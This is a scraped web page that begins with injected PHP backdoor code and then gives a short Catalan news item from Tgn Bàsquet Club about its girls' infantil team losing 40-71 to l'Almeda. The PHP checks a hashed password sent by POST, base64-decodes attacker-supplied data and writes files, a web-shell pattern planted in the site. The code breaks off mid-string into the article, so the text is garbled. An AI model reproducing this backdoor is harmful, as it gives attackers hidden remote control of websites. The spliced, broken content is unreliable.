function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení P paga car la mala primera meitat contra l'Almeda (40-71) - Tgn Bàsquet Club -

L’infantil femení P paga car la mala primera meitat contra l’Almeda (40-71)

Updated: maig 18, 2016

L’equip infantil femení P del TGN Bàsquet va perdre contra l’Almeda en l’últim partit de lliga. El matx es va decidir en la primera meitat perquè al descans s’arribava amb un marcador de 15-39. El joc interior visitant va ser un malson en els primers minuts i, a més, en atac els tirs clars no entraven.

El TGN Bàsquet va millorar, però, en la segona meitat. El partit es va igualar, però el desavantatge dels dos primers períodes va ser clau.